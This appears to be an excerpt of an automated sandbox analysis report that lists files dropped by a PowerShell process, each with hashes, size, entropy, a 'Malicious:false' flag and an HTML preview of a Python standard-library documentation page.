                                                                                                    SSDEEP:3072:LjdD3xYwg0hXiSbWLNDvmDFr2dtpAPzqPzquyfPESQJtpIPzWFwXreY7ow02kAOV:L0xjS2pKeaCig
                                                                                                    MD5:647F2D0D45303E89E03896ACA538B244
                                                                                                    SHA1:063900D4693B4E11FD54687E27E6473D833EDF5E
                                                                                                    SHA-256:9810CDEBCD598768AA4379AD322404E53086D74282E017BDD41B339F5CD86E86
                                                                                                    SHA-512:3F9D6FB473F25BFF73A9D7EF9C2B0C5DBFC0C5F6F808A6629023B5DDBD8F2B32988A3525D70947F52503BBFCE7A7390D69715940ECB501D76849809AEFED702E
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="unittest.mock . mock object library" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/unittest.mock.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/unittest/mock.py unittest.mock is a library for testing in Python. It allows you to replace parts of your system under test with mock objects and make assertions about how they hav..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/unittest/mock.py uni
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16657
                                                                                                    Entropy (8bit):4.853100510708217
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:WiqJqGrtTKHqkX1vKQMLMgwnVTMbZSD1pDQMX6gnZTMboA76dqEC:GYrHqklevwnVTMo1PqgnZTM776dqEC
                                                                                                    MD5:3BF2AC5B2D340EE3747A7992036FA746
                                                                                                    SHA1:18C9914C9E8A3D6F40669DF664E155E6E747E965
                                                                                                    SHA-256:6382EC1D388B6A0C6D61071373E4F36022BFBF6BB63026395E8B1D03960F2734
                                                                                                    SHA-512:C6A00C190F28C0CA6B9C92992A3B6E21A46172DF7569A414F8B9F9863D37CB3B96F1F2FBDF4C0C74CE6CE5AD59277CF23ED61557A6DF7010F3F6F34FFD093FB0
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Unix Specific Services" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/unix.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The modules described in this chapter provide interfaces to features that are unique to the Unix operating system, or in some cases to some or many variants of it. Here.s an overview: posix . The m..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The modules described in this chapter provide interfaces
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (800), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23367
                                                                                                    Entropy (8bit):4.9001952395018105
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:ZQhQbroHqklBrD9hrXnBTMobgkmoGg59TSa8TVeMU7Tsku2XeZOmrD4hrhnVTMD1:TQqyBPf7FMozmoGa9TSaIVeMU7T1u2X6
                                                                                                    MD5:DD460A61B3C952243BDB5DC3BB3361AB
                                                                                                    SHA1:5F3402E5AC5B47BD0354E75856599418E13DA05A
                                                                                                    SHA-256:A562798202C670EF1981A4E18068BE1E164602EB07868AD33B6EDB748DF70E44
                                                                                                    SHA-512:0D20A506018780799D47E40905F168FF1EA00E53BD20E90101CD871109CFDD7164FD92DE6CBE8285A7BC5FF815153CAC775445EA1EE538BA31BF4BD345F7D90E
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="urllib.error . Exception classes raised by urllib.request" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/urllib.error.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/urllib/error.py The urllib.error module defines the exception classes for exceptions raised by urllib.request. The base exception class is URLError. The following exceptions are ra..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (548), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16082
                                                                                                    Entropy (8bit):4.865099246634368
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:B7EMHqklmcGBPneJTMCQHbIpx3cGcpne9TMT76dqEC:lqymxVIMF+xymMT764N
                                                                                                    MD5:E9CC7CAFFBBCD704FF27DBFFD4090FAB
                                                                                                    SHA1:88A2A766415E7C8AA28F9586FB28D7351F7187E8
                                                                                                    SHA-256:040DDCEF87EDC7CFF2D7AD558FD4BF0230EB6A3E475AD49F6005FB6F1CFCF4E3
                                                                                                    SHA-512:D281DDD2A51474118CB2F87B50ED3E8C62B2BABF8A414F297D45CDAF1B5713942C9B827E53F8889FE128DBB2363FC3A6E4861B09900511F3970B9E4455614D92
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="urllib . URL handling modules" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/urllib.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/urllib/ urllib is a package that collects several modules for working with URLs: urllib.request for opening and reading URLs, urllib.error containing the exceptions raised by urlli..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/urllib/ urllib is a package that
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1615), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):111324
                                                                                                    Entropy (8bit):4.849332280825592
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:IqyvMOiP+EylcyT1mdYUXbMsyYVyYWyb4y3gyFIy86VjMsyYVyYWyb4y3gyFIy8X:GzGXZK1hXEg
                                                                                                    MD5:1680B37963B738C4EE93E0FEFA2F06F0
                                                                                                    SHA1:9B94577E029AC679763E350823A9EAE49E33F160
                                                                                                    SHA-256:23615E6440552750DC5A4A06CE7047736A220B5FF40348B1F5E3BAB204CA824E
                                                                                                    SHA-512:7F38398E2CD42A53F9ABBD5B2620C1AD76246ACD2B470C31146B085825AC028A51F72DFE4349659EB04356C312CF419BD06C604F1A144E147048C1E0745413CD
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="urllib.parse . Parse URLs into components" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/urllib.parse.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/urllib/parse.py This module defines a standard interface to break Uniform Resource Locator (URL) strings up in components (addressing scheme, network location, path etc.), to combi..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/urllib/parse.py
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1468), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):221888
                                                                                                    Entropy (8bit):4.877880664619488
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:EqysMS3KTGRCsjcT4k4/LxVx53F87ka7U72iTjyFZyHzyFxyYiyFas/Ml0NvYllm:7rGOcNUbhMlmwtrymJljIqNuwX327bg
                                                                                                    MD5:FACD4640E562DD1F701D544A527DF001
                                                                                                    SHA1:524036E773CCE5AEB80EF0A31C5E85ED0BFEA694
                                                                                                    SHA-256:26B0363BFC6B856D63DACD948EC06C32F0AE8F159D2057B47E052DF8D2647210
                                                                                                    SHA-512:5FD0B6630414D8BAFBE3E78699F223BDF06E4AB39E4A0F2E33AD219D3F03ADDA0E81BB3A6A671BE98A9D106235CECB1AF3237B68BA16DD2A145283C6757BDF57
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="urllib.request . Extensible library for opening URLs" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/urllib.request.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/urllib/request.py The urllib.request module defines functions and classes which help in opening URLs (mostly HTTP) in a complex world . basic and digest authentication, redirection..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (610), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26104
                                                                                                    Entropy (8bit):4.876505397503317
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:5azqyd0LMC/r26TylMTXcpFOuCi5OsOanTlPPMHY764N:yqyIMg26TylMTXcpFOuCi5OsOanTZM41
                                                                                                    MD5:AD066422A2476B17126795A45C6E7B4F
                                                                                                    SHA1:A0D73833D1580704AE0E8E89D0A72F97D79A2718
                                                                                                    SHA-256:03BDE5BAF13AAA8D1172EC06F5503088388D03E9F7912EC523E664DC1A5BBF5A
                                                                                                    SHA-512:AC89D3EB14E053245E595EFE438A8CA4333AD2063190397B081040A6B7B7C2CFBBF42DA7F7260608D84D9684D7F63FFBB3354D8EB9BB62835E4502AC7CF06306
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="urllib.robotparser . Parser for robots.txt" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/urllib.robotparser.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/urllib/robotparser.py This module provides a single class, RobotFileParser, which answers questions about whether or not a particular user agent can fetch a URL on the web site tha..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/urllib/
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1123), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):21552
                                                                                                    Entropy (8bit):4.867093628143615
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:1MFmUHqklHnFnZTMMoab9+RhpsosyFMyFw5yYWRVsoyFMyFHyYr1fyLnNTMlg76g:kqyHFNMKE7psosyFMyFw5yYIVsoyFMy+
                                                                                                    MD5:A2FC2CE3BBD0DF9DA04D1D2DFFAC68B2
                                                                                                    SHA1:09C0EC1D3E0C003345C2DE1D702FD15E7B139928
                                                                                                    SHA-256:50C40FBE4208291CD6BA74373C7441714BB268DB246116873C3925D2BDA5AE47
                                                                                                    SHA-512:22172708165462E7D8E9E2A6B262F412DE860282A7F504F9DDAA5EED3D2424E1B80292BC80B91A947D11A4CCD5CD0E3C8C51AE9844DF501DA58570B8CFDB2B7F
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="uu . Encode and decode uuencode files" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/uu.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/uu.py This module encodes and decodes files in uuencode format, allowing arbitrary binary data to be transferred over ASCII-only connections. Wherever a file argument is expected, ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/uu.py This module encodes and
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1828), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):56407
                                                                                                    Entropy (8bit):5.0278988399964835
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:PqySMU00143O6Q3yFkyFoyFSyFeyFfyFw3yhctUHYLiUXV3nFapDcW/02KBkuVOT:xTg
                                                                                                    MD5:B3E6E2C3318689E5F5D062D78F005A30
                                                                                                    SHA1:E9BEFC0EACC6F3F4520F19FFC6BA12534BEE4DF3
                                                                                                    SHA-256:FB827DA8A88E09D5C9E50ECD15F738E5BF11F01110C89CC706FC092FAB53322C
                                                                                                    SHA-512:609DBEAB39FEE377355D5B84F9EFE75DB81A64C958EE15DC1EE56994722AE1DD790806488BC713A107E2652C952E5CB075154E5A71DA241491492216C5554A30
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="uuid . UUID objects according to RFC 4122" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/uuid.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/uuid.py This module provides immutable UUID objects (the UUID class) and the functions uuid1(), uuid3(), uuid4(), uuid5() for generating version 1, 3, 4, and 5 UUIDs as specified i..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/uuid.py This module pro
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1783), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):96961
                                                                                                    Entropy (8bit):4.748490424622566
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:5qyZMWBFVeem/uYxfyYOyYLyYLyYxyYxyFIyYGy9YzQyI9b+5Y+5SV515L5E5kI5:fu/uqWg
                                                                                                    MD5:A923EFE9930B2C96A6147EEBCBD38ED9
                                                                                                    SHA1:0D94764258FAD7D8A8FF825EBF1063AE52C5E69C
                                                                                                    SHA-256:E7AAFA714A9ED1CE8C0D5D3770A7CAF733F34A6A31D44D95BE19FB509BABF9E9
                                                                                                    SHA-512:27712E65A0A6E59A1BFBB6EC71029D84DCFB4EE145F4F60F9752EDF7BB87D8ABDB0B0F081577F6F0C1E2FBD800FA037551BE7BA4C9EEA57B222FB49A42479A6A
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="venv . Creation of virtual environments" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/venv.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/venv/ The venv module supports creating lightweight .virtual environments., each with their own independent set of Python packages installed in their site directories. A virtual en..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/venv/ The venv module
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1446), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):78597
                                                                                                    Entropy (8bit):4.797620516183057
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:mqy+MCkM9EGiukPJDeNRzpryFByQCyFw8yFH0daprCyPyFcyFkyFCyFnEprCylyp:pMIJAqg
                                                                                                    MD5:92DDAEEC3ABDB8537ACBB360D1805C1A
                                                                                                    SHA1:45FDE1368D1CD84812AE22DC81CCC0A26526DF89
                                                                                                    SHA-256:68C6314DA576BAA8A45BF099D79AF7B16EF1973DDA979DAF4EC7A3EBE8BDBC03
                                                                                                    SHA-512:F65DDEF305B61B9EED21F6F01BCDC2B3E9D0F85F0DD6735F5CB394F3290FF5B764D27BA56EFB9A75E8641849412C5BFC526579CF6F520FD417E934B1FA1C093B
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="warnings . Warning control" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/warnings.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/warnings.py Warning messages are typically issued in situations where it is useful to alert the user of some condition in a program, where that condition (normally) doesn.t warrant..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/warnings.py Warning messages are
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (564), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):39451
                                                                                                    Entropy (8bit):4.887550524319566
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:Hqy9z5Mf1LaMyFs8w1MZ3e8wPtAWkQAGYFboi7W5TQAPQCrQWQw8sd49KkTBkh0o:HqyHMf1LaMyFsh1MZ3e8wPtAWkQAGYFc
                                                                                                    MD5:F46430640AD777A439212FE4A3B34B56
                                                                                                    SHA1:AFF304AA985DDF8429D98FA735DAD80F2AEE2F2D
                                                                                                    SHA-256:B9EC202990B0C1F4DF768F15ADFFF7F7C3E96BDE26BD2F417B55DEBC8C5B94BC
                                                                                                    SHA-512:935C2828131409D509D4002A6A63BB1DC7A255F3617B3932DB2813637DD40B79A591306A8F90EE043A13D17FC3ED6334A42B0F259F6544538E73EFD0A2E0DDC0
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="wave . Read and write WAV files" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/wave.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/wave.py The wave module provides a convenient interface to the Waveform Audio .WAVE. (or .WAV.) file format. Only uncompressed PCM encoded wave files are supported. The wave module..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/wave.py The wave module p
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (885), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):79471
                                                                                                    Entropy (8bit):4.81712097055603
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:Uqy8Mjqk2FLFepge/nnXjU//npVw3/6l/PcJvdeOUsqQGJM4vDToS5iVncb53F/Z:/VLFUGVBOUEE9qDSMg
                                                                                                    MD5:273C882B5B8E6CBA1897D13752A82DAA
                                                                                                    SHA1:F8B0FA2ECA1E90EF260B9D16D7C18929D1981AA4
                                                                                                    SHA-256:327F573C35B9998C2A8D3325FA10968F17B1D7280F64F57E5763DA04748F2C7C
                                                                                                    SHA-512:394BB45B9B7843F97319F72927433DFC29EE1DCB9B77E6079D7E84555527D06A0583345AA41406B3EEC37AF1ABA7753009ED5126E93ADB8FDB7F09C2912E6020
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="weakref . Weak references" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/weakref.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/weakref.py The weakref module allows the Python programmer to create weak references to objects. In the following, the term referent means the object which is referred to by a weak..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/weakref.py The weakref module allows
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (954), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):38336
                                                                                                    Entropy (8bit):4.883402014603931
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:A7uqy/+INMiFiAx6U1pLTNyLuyTIiTfCTTv2yFEObbAyFwuyYmmoEzyRAc/LTNyJ:A7uqytMiNYU1pLTNyLuyTIiTfCTTv2y/
                                                                                                    MD5:ABB39CD64704D762FFA6B30F59DD06C4
                                                                                                    SHA1:47F769E89383F6E3AF4FA3446CD509FB2EF7BEDF
                                                                                                    SHA-256:1F6110281EC11819B923B9FDE0A234786F8B7B2D9E56826371D8A7F870AF358F
                                                                                                    SHA-512:B29A253EBEC4D8517D56CBE06C1FED11CA167FD80EFB39D7B331746346BDF5A6263DD5F38BF3CAD24AE887A856E2AE783CC759D50CDAB266699339E25EECC1FB
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="webbrowser . Convenient web-browser controller" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/webbrowser.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/webbrowser.py The webbrowser module provides a high-level interface to allow displaying web-based documents to users. Under most circumstances, simply calling the open() function f..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/webbrowser.p
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15487
                                                                                                    Entropy (8bit):4.871987666436683
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:Wurti4KHqkX1vQMuMg9nZ9TMbC//8cNM06TnZhTMbLA76dqEC:gBHqkllG9nZ9TMFnTTnZhTMI76dqEC
                                                                                                    MD5:AEE550B4E89D47C5F337353C343A646B
                                                                                                    SHA1:DAE252B7A2B752B5CAE3029CA49BD641DD1334FC
                                                                                                    SHA-256:C54CAD47AD211BAC61BBBA8807DDC391DFCF4653536A6E630580C3E74B4F175B
                                                                                                    SHA-512:396E56B9A315D6F9F26CB720CD585421DC86DE4757BE2F4A3F17E4D35D3B339460EFFDA4398128FBDE2E1544A4C15F3C2938FF5223DC43D4785404CE1F3D988E
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="MS Windows Specific Services" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/windows.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This chapter describes modules that are only available on MS Windows platforms. msvcrt . Useful routines from the MS VC++ runtime- File Operations, Console I/O, Other Functions., winreg . Windows r..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This chapter describes modules that are only ava
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (873), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):94874
                                                                                                    Entropy (8bit):4.966208973456304
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:qqyl7MjYzA6TMqg5lnx5l/yLlycBF5lqg05llyg/yLVij5O6r5HMB5HOPyNqpG5s:YQ4WiNCCaqg
                                                                                                    MD5:2D6596A56268E491DE4F0BD3190464F9
                                                                                                    SHA1:3BACE70E70E6E49472538D409201E698ECC73DE6
                                                                                                    SHA-256:20E957E2C50EBDEB0ED1C456B755F5DD2DA4AF5BB151B99EB5FEE04AD5D85B31
                                                                                                    SHA-512:287DECB10ED4A17B116149ACC4ED780E7440C3E7B8AAC11F27E16D0D00F8ED57DB9100A5F863E8FA688B1A774A9366781F345C9A34AC10E536775FEC4AE7BD54
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="winreg . Windows registry access" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/winreg.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="These functions expose the Windows registry API to Python. Instead of using an integer as the registry handle, a handle object is used to ensure that the handles are closed correctly, even if the p..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="These functions expose the Windows registry API
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (506), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):29702
                                                                                                    Entropy (8bit):4.985365649263579
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:px2nqylp4Mdh7AvAGpgyLk8yN5Sovk0AYRkkA0MYn3lj8kuNBSl9ib/qWBsqWM51:pxyqy4Mdh7AvAGpgyLk8yN5SovhxRkkQ
                                                                                                    MD5:D5C3239381960CFA14CF454360EBAD0D
                                                                                                    SHA1:08EC44782B488401C7E3480E3AA92536E8401A83
                                                                                                    SHA-256:6C78A6395FBDBC46EF7D864744131D36FAAD9260E48D4E86CA7CB1D426675C4B
                                                                                                    SHA-512:165B39FF540BB395F8750F0C5999D7DA2BD4446B0BD39DAB0593C3C9C35E5759A6AB5F09C3ABABA53C70721C1A1548338B873EDE19F7D5534617C18B20F234F7
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="winsound . Sound-playing interface for Windows" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/winsound.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The winsound module provides access to the basic sound-playing machinery provided by Windows platforms. It includes functions and several constants." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The winsound module provides access to the basic sound-playing machinery provided b
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1004), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):126181
                                                                                                    Entropy (8bit):4.87775572417589
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:frqyM56M9O56HO7HQyT9IHPYHzBmHp0GHbaKlVyXvfdqJ7sbd8bOojO/DRccGTO7:Wo15xfBHRFhvCTOrwZ/bg
                                                                                                    MD5:861B0818593C73384EBC77DCF88965AD
